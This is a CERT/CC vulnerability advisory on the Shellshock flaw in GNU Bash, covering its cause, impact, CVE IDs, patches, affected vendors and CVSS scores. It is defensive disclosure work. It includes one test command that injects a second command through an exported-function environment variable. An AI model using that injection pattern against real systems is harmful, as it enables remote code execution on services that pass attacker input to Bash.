Vulnerability Note VU#252743

GNU Bash shell executes commands in exported functions in environment variables

Original Release date: 25 Sep 2014 | Last revised: 14 Apr 2015

Overview

GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.

Description

UPDATE: New CVE-IDs added for incomplete patches. Additional resources added and vendor patch information updated.

CWE-78: OS Command Injection

Bash supports exporting of shell functions to other instances of bash using an environment variable. This environment variable is named by the function name and starts with a "() {" as the variable value in the function definition. When Bash reaches the end of the function definition, rather than ending execution it continues to process shell commands written after the end of the function. This vulnerability is especially critical because Bash is widespread on many types of devices (UNIX-like operating systems including Linux and Mac OS X), and because many network services utilize Bash, causing the vulnerability to be network exploitable. Any service or program that sets environment variables controlled by an attacker and calls Bash may be vulnerable.

Red Hat has developed the following test:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

The website shellshocker.net from the health IT team at Medical Informatics Engineering has developed several tests for websites and hosts and includes update information.

This vulnerability is being actively exploited.

Impact

A malicious attacker may be able to execute arbitrary code at the privilege level of the calling application.

Solution

Apply an Update
The first several set of patches (for CVE-2014-6271) do not completely resolve the vulnerability. CVE-2014-7169, CVE-2014-6277, CVE-2014-7186, and CVE 2014-7187 identify the remaining aspects of this vulnerability. Red Hat has provided a support article with updated information and workarounds.

CERT/CC has also included vendor patch information below when notified of an update.

Vendor Information (Learn More)

Many UNIX-like operating systems, including Linux distributions and Apple Mac OS X include Bash and are likely to be vulnerable. Contact your vendor for information about updates or patches. This Red Hat support article and blog post describe ways that Bash can be called from other programs, including network vectors such as CGI, SSH, and DHCP. Shell Shock Exploitation Vectors describes other ways this vulnerability could be exploited.

VendorStatusDate NotifiedDate Updated
Apple Inc.Affected25 Sep 201401 Oct 2014
Avaya, Inc.Affected25 Sep 201429 Sep 2014
Barracuda NetworksAffected25 Sep 201427 Sep 2014
Blue Coat SystemsAffected25 Sep 201427 Sep 2014
CentOSAffected-27 Sep 2014
Check Point Software TechnologiesAffected25 Sep 201427 Sep 2014
Cisco Systems, Inc.Affected25 Sep 201426 Sep 2014
CygwinAffected-26 Sep 2014
D-Link Systems, Inc.Affected25 Sep 201407 Oct 2014
Debian GNU/LinuxAffected25 Sep 201427 Sep 2014
Dell Computer Corporation, Inc.Affected-27 Sep 2014
Extreme NetworksAffected25 Sep 201401 Oct 2014
F5 Networks, Inc.Affected25 Sep 201426 Sep 2014
Fedora ProjectAffected25 Sep 201427 Sep 2014
FireEyeAffected-02 Oct 2014
If you are a vendor and your product is affected, let us know.View More »

CVSS Metrics (Learn More)

Group Score Vector
Base 10.0 AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal 9.5 E:H/RL:W/RC:C
Environmental 9.6 CDP:LM/TD:H/CR:ND/IR:ND/AR:ND

References

Credit

This document was written by Chris King.

Other Information

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.